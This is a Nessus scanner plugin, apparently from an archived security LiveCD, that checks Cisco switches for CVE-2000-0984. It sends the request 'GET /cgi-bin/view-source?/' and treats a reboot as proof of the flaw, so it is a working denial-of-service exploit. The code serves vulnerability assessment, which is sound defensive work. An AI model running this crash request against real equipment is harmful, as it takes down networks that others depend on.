home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / cisco-view-source-dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  78 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10682);
  10.  script_bugtraq_id(1838);
  11.  script_cve_id("CVE-2000-0984");
  12.  script_version ("$Revision: 1.15 $");
  13.  
  14.  name["english"] = "CISCO view-source DoS";
  15.  name["francais"] = "CISCO view-source DoS";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. It was possible to make the remote switch reboot by requesting :
  20.  
  21.     GET /cgi-bin/view-source?/
  22.     
  23.  
  24. An attacker may use this flaw to prevent your network from working
  25. properly.
  26.  
  27. Solution : see http://www.cisco.com/warp/public/707/httpserverquery-pub.shtml
  28. Risk factor : High";
  29.  
  30.  
  31.  
  32.  
  33.  script_description(english:desc["english"]);
  34.  
  35.  summary["english"] = "crashes the remote switch";
  36.  
  37.  script_summary(english:summary["english"]);
  38.  
  39.  script_category(ACT_KILL_HOST);
  40.  
  41.  
  42.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  43.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  44.  family["english"] = "Denial of Service";
  45.  family["francais"] = "DΘni de service";
  46.  script_family(english:family["english"], francais:family["francais"]);
  47.  script_dependencie("find_service.nes", "no404.nasl");
  48.  script_require_ports("Services/www", 80);
  49.  exit(0);
  50. }
  51.  
  52. #
  53. # The script code starts here
  54. #
  55.  
  56. include("http_func.inc");
  57.  
  58. port = get_http_port(default:80);
  59.  
  60.  
  61. if(get_port_state(port))
  62. {
  63.  start_denial();
  64.  soc = http_open_socket(port);
  65.  if(soc)
  66.  {
  67.   data = http_get(item:string("/cgi-bin/view-source?/"), port:port);
  68.   send(socket:soc, data:data);
  69.   http_close_socket(soc);
  70.   alive = end_denial();
  71.   if(!alive)
  72.   {
  73.    security_hole(port);
  74.    set_kb_item(name:"Host/dead", value:TRUE);
  75.   }
  76.  }
  77. }
  78.